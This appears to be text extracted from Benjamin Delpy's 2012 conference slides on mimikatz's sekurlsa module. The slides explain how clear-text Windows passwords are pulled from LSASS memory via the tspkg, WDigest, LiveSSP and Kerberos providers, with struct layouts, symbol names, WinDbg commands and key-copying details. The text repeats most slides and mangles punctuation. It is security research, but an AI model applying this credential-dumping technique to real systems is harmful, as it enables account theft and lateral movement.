If we can get data and inject it in another session of LSASS we avoid authentication part
This is the principle of laquo Pass-the-hash raquo
ndash In fact of laquo Pass-the-x raquo
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 7 7
PLAYSKOOL
mimikatz sekurlsa history of laquo pass-the- raquo 12
mimikatz sekurlsa history of laquo pass-the- raquo 12
Pass-the-hash ndash 1997 - Unix modified SAMBA client for Hashes usage Paul Ashton (EIGEN)
ndash 2000 - Private version of a Windows laquo LSA Logon Session Editor raquo Hernan Ochoa (CoreSecurity)
ndash 2007 - TechEd Microsoft Marc Murray (TrueSec) present msvctl and provide some downloads of it
ndash 2007 - laquo Pass the hash toolkit raquo published Hernan Ochoa (CoreSecurity)
ndash 2007 - mimikatz 01 includes pass the hash and is publicly available for x86 amp x64 versions of Windows (yeah by myself but in French so not famous ))
2007 was the year of pass the hash
Pass-the-ticket ndash 042011 - wce (pass the hash toolkit evolution) provides Kerberos ticket
support Hernan Ochoa (Ampliasecurity)
Pass-the-hash ndash 1997 - Unix modified SAMBA client for Hashes usage Paul Ashton (EIGEN)
ndash 2000 - Private version of a Windows laquo LSA Logon Session Editor raquo Hernan Ochoa (CoreSecurity)
ndash 2007 - TechEd Microsoft Marc Murray (TrueSec) present msvctl and provide some downloads of it
ndash 2007 - laquo Pass the hash toolkit raquo published Hernan Ochoa (CoreSecurity)
ndash 2007 - mimikatz 01 includes pass the hash and is publicly available for x86 amp x64 versions of Windows (yeah by myself but in French so not famous ))
2007 was the year of pass the hash
Pass-the-ticket ndash 042011 - wce (pass the hash toolkit evolution) provides Kerberos ticket
support Hernan Ochoa (Ampliasecurity)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 8 8
mimikatz sekurlsa history of laquo pass-the- raquo 22
mimikatz sekurlsa history of laquo pass-the- raquo 22
Pass-the-pass ndash 052011 ndash mimikatz 10 dumps first clear text passwords from TsPkg provider (but limited to NT
6 and some XP SP3) bull httpbloggentilkiwicomsecuritepass-the-pass
ndash 052011 ndash return of mimikatz it dumps clear text passwords from WDigest provider (unlimited this time ))
bull httpbloggentilkiwicomsecuritere-pass-the-pass
ndash 052011 ndash Some organizations opened cases to Microsoft about ithellip
hellipLots of timehellip
ndash begin of 2012 - Lots of blogs (and Kevin Mitnick )) say few words about mimikatz
ndash 032012 - Hernan Ochoa (Ampliasecurity) publish at seclists that wce support WDigest password extracthellip
bull httpseclistsorgpen-test2012Mar7
ndash 032012 ndash mimikatz strikes again with LiveSSP provider and extracts Live login passwords from Windows 8 memory
bull httpbloggentilkiwicomsecuriterere-pass-the-pass
ndash 032012 ndash yeah once againhellip more curious but Kerberos keeps passwords in memory bull httpbloggentilkiwicomsecuritererere-pass-the-pass
ndash 082012 ndash sekurlsa module without injection at all (ultra safe) bull httpbloggentilkiwicomsecuritemimikatzsekurlsa-fait-son-apparition
Pass-the-pass ndash 052011 ndash mimikatz 10 dumps first clear text passwords from TsPkg provider (but limited to NT
6 and some XP SP3) bull httpbloggentilkiwicomsecuritepass-the-pass
ndash 052011 ndash return of mimikatz it dumps clear text passwords from WDigest provider (unlimited this time ))
bull httpbloggentilkiwicomsecuritere-pass-the-pass
ndash 052011 ndash Some organizations opened cases to Microsoft about ithellip
hellipLots of timehellip
ndash begin of 2012 - Lots of blogs (and Kevin Mitnick )) say few words about mimikatz
ndash 032012 - Hernan Ochoa (Ampliasecurity) publish at seclists that wce support WDigest password extracthellip
bull httpseclistsorgpen-test2012Mar7
ndash 032012 ndash mimikatz strikes again with LiveSSP provider and extracts Live login passwords from Windows 8 memory
bull httpbloggentilkiwicomsecuriterere-pass-the-pass
ndash 032012 ndash yeah once againhellip more curious but Kerberos keeps passwords in memory bull httpbloggentilkiwicomsecuritererere-pass-the-pass
ndash 082012 ndash sekurlsa module without injection at all (ultra safe) bull httpbloggentilkiwicomsecuritemimikatzsekurlsa-fait-son-apparition
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 9 9
mimikatz sekurlsa tspkg mimikatz sekurlsa tspkg
because sometimes hash is not enoughhellip
because sometimes hash is not enoughhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 10 10
mimikatz sekurlsa tspkg what is it
mimikatz sekurlsa tspkg what is it
Microsoft introduces SSO capability for Terminal Server with NT 6 to improve RemoteApps and RemoteDestkop usersrsquos experience ndash httptechnetmicrosoftcomlibrarycc772108aspx
Rely on CredSSP with Credentials Delegation (= Account delegation) ndash Specs httpdownloadmicrosoftcomdownload95e95ef66af-
9026-4bb0-a41d-a4f81802d92c5Bms-cssp5Dpdf
First impression it seems cool ndash User does not have to type its password
ndash Password is not in RDP file
ndash Password is not in user secrets
Microsoft introduces SSO capability for Terminal Server with NT 6 to improve RemoteApps and RemoteDestkop usersrsquos experience ndash httptechnetmicrosoftcomlibrarycc772108aspx
Rely on CredSSP with Credentials Delegation (= Account delegation) ndash Specs httpdownloadmicrosoftcomdownload95e95ef66af-
9026-4bb0-a41d-a4f81802d92c5Bms-cssp5Dpdf
First impression it seems cool ndash User does not have to type its password
ndash Password is not in RDP file
ndash Password is not in user secrets
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 11 11
mimikatz sekurlsa tspkg questions
mimikatz sekurlsa tspkg questions
KB says that for it works we must enable laquo Default credentials raquo delegation ndash ldquoDefault credentials The credentials obtained when the user first logs on to
Windowsrdquo - httpsmsdnmicrosoftcomlibrarybb204773aspx
bull What Our UserDomainPassword | Hash | Ticket It seems hellip ndash In all cases system seems to be vulnerable to pass-the-hellip
In what form Our specs [MS-CSSP]
ndash 22121 TSPasswordCreds bull The TSPasswordCreds structure contains the users password credentials that are delegated
to the server (or PIN) TSPasswordCreds = SEQUENCE
domainName [0] OCTET STRING userName [1] OCTET STRING password [2] OCTET STRING
ndash Challenge response for authentication bull Serveur YES (TLS Kerberos) bull Client NO password is sent to serverhellip
So password resides somewhere in memory
KB says that for it works we must enable laquo Default credentials raquo delegation ndash ldquoDefault credentials The credentials obtained when the user first logs on to
Windowsrdquo - httpsmsdnmicrosoftcomlibrarybb204773aspx
bull What Our UserDomainPassword | Hash | Ticket It seems hellip ndash In all cases system seems to be vulnerable to pass-the-hellip
In what form Our specs [MS-CSSP]
ndash 22121 TSPasswordCreds bull The TSPasswordCreds structure contains the users password credentials that are delegated
to the server (or PIN) TSPasswordCreds = SEQUENCE
domainName [0] OCTET STRING userName [1] OCTET STRING password [2] OCTET STRING
ndash Challenge response for authentication bull Serveur YES (TLS Kerberos) bull Client NO password is sent to serverhellip
So password resides somewhere in memory
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 12 12
mimikatz sekurlsa tspkg symbols amp theory
mimikatz sekurlsa tspkg symbols amp theory
Letrsquos explore some symbols
ndash sounds coolhellip (thanks Microsoft)
Letrsquos imagine a scenario ndash Enumerate all sessions to obtain
bull Username
bull Domain
bull LUID
ndash Call tspkgTSCredTableLocateDefaultCreds (rely on RtlLookupElementGenericTableAvl) with LUID to obtain
bull TS_CREDENTIAL
ndash Call tspkgTSObtainClearCreds (rely on LsaUnprotectMemory) with TS_CREDENTIAL data (TS_PRIMARY_CREDENTIAL) for
bull TS_PRIMARY_CREDENTIAL with clear text credentialshellip
Letrsquos explore some symbols
ndash sounds coolhellip (thanks Microsoft)
Letrsquos imagine a scenario ndash Enumerate all sessions to obtain
bull Username
bull Domain
bull LUID
ndash Call tspkgTSCredTableLocateDefaultCreds (rely on RtlLookupElementGenericTableAvl) with LUID to obtain
bull TS_CREDENTIAL
ndash Call tspkgTSObtainClearCreds (rely on LsaUnprotectMemory) with TS_CREDENTIAL data (TS_PRIMARY_CREDENTIAL) for
bull TS_PRIMARY_CREDENTIAL with clear text credentialshellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 13 13
kdgt x tspkgclear 75016d1c tspkgTSObtainClearCreds = ltno type informationgt kdgt x tspkgpassword 75011b68 tspkgTSDuplicatePassword = ltno type informationgt 75011cd4 tspkgTSHidePassword = ltno type informationgt 750195ee tspkgTSRevealPassword = ltno type informationgt 75012fbd tspkgTSUpdateCredentialsPassword = ltno type informationgt kdgt x tspkglocate 7501158b tspkgTSCredTableLocateDefaultCreds = ltno type informationgt
mimikatz sekurlsa tspkg workflow
mimikatz sekurlsa tspkg workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 14 14
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_TS_CREDENKIWI_TS_CREDENTIAL
KIWI_TS_PRIMARKIWI_TS_PRIMARY_CREDENTIAL
typedef struct _KIWI_TS_PRIMARY_CREDENTIAL PVOID unk0 LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Password
KIWI_TS_PRIMARY_CREDENTIAL PKIWI_TS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
tspkgTSGlobalCredTable
typedef struct _KIWI_TS_CREDENTIAL ifdef _M_X64 BYTE unk0[108] elif defined _M_IX86 BYTE unk0[64] endif LUID LocallyUniqueIdentifier PVOID unk1 PVOID unk2 PKIWI_TS_PRIMARY_CREDENTIAL pTsPrimary KIWI_TS_CREDENTIAL PKIWI_TS_CREDENTIAL
KIWI_TS_CREDENKIWI_TS_CREDENTIAL
mimikatz sekurlsa tspkg demo time
mimikatz sekurlsa tspkg demo time
sekurlsatspkg
sekurlsatspkg
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 15 15
mimikatz sekurlsa wdigest mimikatz sekurlsa wdigest
because clear text password over httphttps is not cool
because clear text password over httphttps is not cool
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 16 16
mimikatz sekurlsa wdigest what is it
mimikatz sekurlsa wdigest what is it
ldquoDigest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a users web browser It applies a hash function to a password before sending it over the network [hellip]rdquo Wikipedia httpenwikipediaorgwikiDigest_access_authentication
ldquoCommon Digest Authentication Scenarios ndash Authenticated client access to a Web site ndash Authenticated client access using SASL ndash Authenticated client access with integrity protection to a directory service
using LDAPrdquo Microsoft httptechnetmicrosoftcomlibrarycc778868aspx
Again it seems cool ndash No password over the network just hashes ndash No reversible password in Active Directory hashes for each realm
bull Only with Advanced Digest authentication
ldquoDigest access authentication is one of the agreed-upon methods a web server can use to negotiate credentials with a users web browser It applies a hash function to a password before sending it over the network [hellip]rdquo Wikipedia httpenwikipediaorgwikiDigest_access_authentication
ldquoCommon Digest Authentication Scenarios ndash Authenticated client access to a Web site ndash Authenticated client access using SASL ndash Authenticated client access with integrity protection to a directory service
using LDAPrdquo Microsoft httptechnetmicrosoftcomlibrarycc778868aspx
Again it seems cool ndash No password over the network just hashes ndash No reversible password in Active Directory hashes for each realm
bull Only with Advanced Digest authentication
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 17 17
mimikatz sekurlsa wdigest what is it
mimikatz sekurlsa wdigest what is it
We speak about hashes but what hashes H = MD5(HA1nonce[hellip]HA2)
bull HA1 = MD5(usernamerealmpassword)
bull HA2 = MD5(methoddigestURI[hellip])
Even after login HA1 may changehellip realm is from server side and cannot be determined before Windows logon
WDigest provider must have elements to compute responses for different servers ndash Username
ndash Realm (from server)
ndash Password
We speak about hashes but what hashes H = MD5(HA1nonce[hellip]HA2)
bull HA1 = MD5(usernamerealmpassword)
bull HA2 = MD5(methoddigestURI[hellip])
Even after login HA1 may changehellip realm is from server side and cannot be determined before Windows logon
WDigest provider must have elements to compute responses for different servers ndash Username
ndash Realm (from server)
ndash Password
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 18 18
mimikatz sekurlsa wdigest theory
mimikatz sekurlsa wdigest theory
This time we know ndash that WDigest keeps password in memory laquo by protocol raquo for HA1 digest ndash that LSASS love to unprotect password with LsaUnprotectMemory (so protect
with LsaProtectMemory)
LsaUnprotectMemory ndash At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLE ndash Letrsquos perform a research in WDigest
ndash Hypothesis seems verified
LsaProtectMemory ndash At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLE ndash Letrsquos perform a research in WDigest
ndash SpAcceptCredentials takes clear password in args
bull Protect it with LsaProtectMemory bull Update or insert data in double linked list wdigestl_LogSessList
This time we know ndash that WDigest keeps password in memory laquo by protocol raquo for HA1 digest ndash that LSASS love to unprotect password with LsaUnprotectMemory (so protect
with LsaProtectMemory)
LsaUnprotectMemory ndash At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLE ndash Letrsquos perform a research in WDigest
ndash Hypothesis seems verified
LsaProtectMemory ndash At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLE ndash Letrsquos perform a research in WDigest
ndash SpAcceptCredentials takes clear password in args
bull Protect it with LsaProtectMemory bull Update or insert data in double linked list wdigestl_LogSessList
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 19 19
text7409D151 _DigestCalcHA18 call dword ptr [eax+0B4h]
text74096C69 _SpAcceptCredentials16 call dword ptr [eax+0B0h]
mimikatz sekurlsa wdigest workflow
mimikatz sekurlsa wdigest workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 20 20
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
typedef struct _KIWI_WDIGEST_LIST_ENTRY struct _KIWI_WDIGEST_LIST_ENTRY Flink struct _KIWI_WDIGEST_LIST_ENTRY Blink DWORD UsageCount struct _KIWI_WDIGEST_LIST_ENTRY This LUID LocallyUniqueIdentifier [hellip] LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password [hellip]
KIWI_WDIGEST_LIST_ENTRY PKIWI_WDIGEST_LIST_ENTRY
wdigestl_LogSessList
search linked list for LUID
KIWI_WDIGEST_LKIWI_WDIGEST_LIST_ENTRY
password in clear
mimikatz sekurlsa wdigest demo time
mimikatz sekurlsa wdigest demo time
sekurlsawdigest
sekurlsawdigest
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 21 21
mimikatz sekurlsa livessp mimikatz sekurlsa livessp
because Microsoft was too good in closed networks
because Microsoft was too good in closed networks
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 22 22
mimikatz sekurlsa livessp how
mimikatz sekurlsa livessp how
Actually Irsquove only used logical (empirical) approach to search passwordshellip ndash Protocol reading
ndash Symbols searching
~ Boring ~hellip be more brutal this time make a WinDBG trap
Actually Irsquove only used logical (empirical) approach to search passwordshellip ndash Protocol reading
ndash Symbols searching
~ Boring ~hellip be more brutal this time make a WinDBG trap
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 23 23
0 kdgt process 0 0 lsassexe PROCESS 83569040 SessionId 0 Cid 0224 Peb 7f43f000 ParentCid 01b4 DirBase 5df58100 ObjectTable 80ce4740 HandleCount ltData Not Accessiblegt Image lsassexe 0 kdgt process i 83569040 You need to continue execution (press g ltentergt) for the context to be switched When the debugger breaks in again you will be in the new process context 0 kdgt g Break instruction exception - code 80000003 (first chance) ntRtlpBreakWithStatusInstruction 814b39d0 cc int 3 0 kdgt reload user Loading User Symbols 0 kdgt bp p $proc lsasrvLsaProtectMemory kc 5 g 0 kdgt g
mimikatz sekurlsa livessp how
mimikatz sekurlsa livessp how
Letrsquos login with a Live account on Windows 8
After credentials protection LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)
Letrsquos login with a Live account on Windows 8
After credentials protection LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 24 24
lsasrvLsaProtectMemory livesspLiveMakeSupplementalCred livesspLiveMakeSecPkgCredentials livesspLsaApLogonUserEx2 livesspSpiLogonUserEx2 lsasrvLsaProtectMemory msv1_0NlpAddPrimaryCredential msv1_0SspAcceptCredentials msv1_0SpAcceptCredentials lsasrvLsaProtectMemory tspkgTSHidePassword tspkgSpAcceptCredentials
1 kdgt uf c livesspLsaApLogonUserEx2 livesspLsaApLogonUserEx2 (74781536) [] livesspLsaApLogonUserEx2+0x560 (74781a96) call to livesspLiveCreateLogonSession (74784867)
Our LiveSSP provider
Yeah Pass the Hash capability with Live account toohellip
Live user can logon through RDP via SSO
mimikatz sekurlsa livessp workflow
mimikatz sekurlsa livessp workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 25 25
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_LIVESSP_LIST_ENTRY struct _KIWI_LIVESSP_LIST_ENTRY Flink struct _KIWI_LIVESSP_LIST_ENTRY Blink PVOID unk0 PVOID unk1 PVOID unk2 PVOID unk3 DWORD unk4 DWORD unk5 PVOID unk6 LUID LocallyUniqueIdentifier LSA_UNICODE_STRING UserName PVOID unk7 PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds
KIWI_LIVESSP_LIST_ENTRY PKIWI_LIVESSP_LIST_ENTRY
livesspLiveGlobalLogonSessionList
search linked list for LUID
KIWI_LIVESSP_LISKIWI_LIVESSP_LIST_ENTRY KIWI_LIVESSP_PRIKIWI_LIVESSP_PRIMARY_CREDENTIAL
typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL DWORD isSupp DWORD unk0 LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password
KIWI_LIVESSP_PRIMARY_CREDENTIAL PKIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsa mimikatz sekurlsa
Even if we already have tools for normal accounts are you not curious to test one with this trap
Even if we already have tools for normal accounts are you not curious to test one with this trap
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 26 26
Me yes
mimikatz sekurlsa kerberos mimikatz sekurlsa kerberos
Letrsquos login normal account
After credentials protection KerbCreateLogonSession calls ndash NT6 KerbInsertOrLocateLogonSession to insert data in
KerbGlobalLogonSessionTable
ndash NT5 KerbInsertLogonSession to insert data in KerbLogonSessionList
Letrsquos login normal account
After credentials protection KerbCreateLogonSession calls ndash NT6 KerbInsertOrLocateLogonSession to insert data in
KerbGlobalLogonSessionTable
ndash NT5 KerbInsertLogonSession to insert data in KerbLogonSessionList
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 27 27
lsasrvLsaProtectMemory kerberosKerbHideKey kerberosKerbCreatePrimaryCredentials kerberosKerbCreateLogonSession kerberosSpAcceptCredentials lsasrvLsaProtectMemory kerberosKerbHidePassword kerberosKerbCreateLogonSession kerberosSpAcceptCredentials lsasrvLsaProtectMemory msv1_0NlpAddPrimaryCredential msv1_0SspAcceptCredentials msv1_0SpAcceptCredentials lsasrvLsaProtectMemory wdigestSpAcceptCredentials lsasrvLsaProtectMemory tspkgTSHidePassword tspkgSpAcceptCredentials
Kerberos part for password
Kerberos ticket part Maybe )
mimikatz sekurlsa kerberos (nt6) workflow
mimikatz sekurlsa kerberos (nt6) workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 28 28
RtlLookupElementGenericTableAvl
LsaUnprotectMemory
KIWI_KERBEROS_PR
KIWI_KERBEROS_PRIMARY_CREDENTIAL
typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL DWORD unk0 PVOID unk1 PVOID unk2 PVOID unk3 ifdef _M_X64 BYTE unk4[32] elif defined _M_IX86 BYTE unk4[20] endif LUID LocallyUniqueIdentifier ifdef _M_X64 BYTE unk5[44] elif defined _M_IX86 BYTE unk5[36] endif LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password KIWI_KERBEROS_PRIMARY_CREDENTIAL PKIWI_KERBEROS_PRIMARY_CREDENTIAL
LsaEnumerateLogonSessions
for each LUID
password in clear
KIWI_KERBEROS_PR
KIWI_KERBEROS_PRIMARY_CREDENTIAL
KerberosKerbGlobalLogonSessionTable
mimikatz sekurlsa kerberos (nt5) workflow
mimikatz sekurlsa kerberos (nt5) workflow
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 29 29
LsaUnprotectMemory
LsaEnumerateLogonSessions
for each LUID
password in clear
typedef struct _KIWI_KERBEROS_LOGON_SESSION struct _KIWI_KERBEROS_LOGON_SESSION Flink struct _KIWI_KERBEROS_LOGON_SESSION Blink DWORD UsageCount PVOID unk0 PVOID unk1 PVOID unk2 DWORD unk3 DWORD unk4 PVOID unk5 PVOID unk6 PVOID unk7 LUID LocallyUniqueIdentifier
ifdef _M_IX86 DWORD unk8
endif DWORD unk9 DWORD unk10 PVOID unk11 DWORD unk12 DWORD unk13 PVOID unk14 PVOID unk15 PVOID unk16 [hellip] LSA_UNICODE_STRING UserName LSA_UNICODE_STRING Domaine LSA_UNICODE_STRING Password
KIWI_KERBEROS_LOGON_SESSION PKIWI_KERBEROS_LOGON_SESSION
kerberosKerbLogonSessionList
search linked list for LUID
KIWI_LIVESSP_PRIKIWI_LIVESSP_PRIMARY_CREDENTIAL
mimikatz sekurlsa demo time
mimikatz sekurlsa demo time
Final sekurlsa demo sekurlsalogonPasswords full
Final sekurlsa demo sekurlsalogonPasswords full
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 30 30
mimikatz sekurlsa kerberos ldquohu rdquo
mimikatz sekurlsa kerberos ldquohu rdquo
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
Ok It workshellip
But why
Not at all logon on NT5 (can need an unlock)
From my understanding of Microsoft explanations
ndash no need of passwords for the Kerberos protocolhellip
ndash all is based on the hash (not very sexy too)
Microsoftrsquos implementation of Kerberos is full of logicalhellip
ndash For password auth
bull password hash for shared secret but keeping password in memory
ndash For full smartcard auth
bull No password on client
bull No hash on client
ndash NTLM hash on clienthellip
ndash KDC sent it back as a gift
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 31 31
mimikatz sekurlsa mimikatz sekurlsa
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
All passwords in memory are encrypted but in a reversible way to be used
We used LsaUnprotecMemory in the LSASS context to decrypt them
ndash This function rely on LsaEncryptMemory from lsasrvdll
For that we previously inject a DLL (sekurlsadll) in the LSASS process to take benefits of its keys when we called it
Can it be fun to decrypt outside the process ndash Yes it ishellip no more injection just reading memory of LSASS processhellip
mimikatz can use lsasrvdll too and ldquoimportsrdquo LSASS initialized keys ndash When we call LsaEncryptMemory in mimikatz with all keys imported from LSASS we have
the same comportments than when we are in LSASS
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 32 32
LsaUnprotectMemory
mimikatz sekurlsa LsaEncryptMemory NT5
mimikatz sekurlsa LsaEncryptMemory NT5
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
Depending on the size of the secret LsaEncryptMemory use
ndash RC4
ndash DESx
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 33 33
g_pRandomKey
g_cbRandomKey
BYTE[g_cbRandomKey]
DWORD 256
BYTE[g_cbRandomKey]
g_pDESXKey BYTE[144]
BYTE[144]
g_Feedback BYTE[8]
lsass
lsass
lsasrv
lsasrv
lsass
lsass
lsasrv
lsasrv
mimikatz
mimikatz
lsasrv
lsasrv
copyhellip
mimikatz sekurlsa LsaEncryptMemory NT6
mimikatz sekurlsa LsaEncryptMemory NT6
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
Depending on the size of the secret LsaEncryptMemory use
ndash 3DES
ndash AES
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 34 34
InitializationVector BYTE[16]
lsass
lsass
lsasrv
lsasrv
lsass
lsass
lsasrv
lsasrv
mimikatz
mimikatz
copyhellip
h3DesKey
typedef struct _KIWI_BCRYPT_KEY_DATA DWORD size DWORD tag DWORD type DWORD unk0 DWORD unk1 DWORD unk2 DWORD unk3 PVOID unk4 BYTE data etc KIWI_BCRYPT_KEY_DATA PKIWI_BCRYPT_KEY_DATA
hAesKey
lsasrv
lsasrv
typedef struct _KIWI_BCRYPT_KEY DWORD size DWORD type PVOID unk0 PKIWI_BCRYPT_KEY_DATA cle PVOID unk1 KIWI_BCRYPT_KEY PKIWI_BCRYPT_KEY
mimikatz sekurlsa memo
mimikatz sekurlsa memo
Security Packages
Protection Keys
Security Packages
Protection Keys
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 35 35
Package Symbols Type
tspkg tspkgTSGlobalCredTable RTL_AVL_TABLE
wdigest wdigestl_LogSessList LIST_ENTRY
livessp livesspLiveGlobalLogonSessionList LIST_ENTRY
kerberos (nt5) kerberosKerbLogonSessionList LIST_ENTRY
kerberos (nt6) kerberosKerbGlobalLogonSessionTable RTL_AVL_TABLE
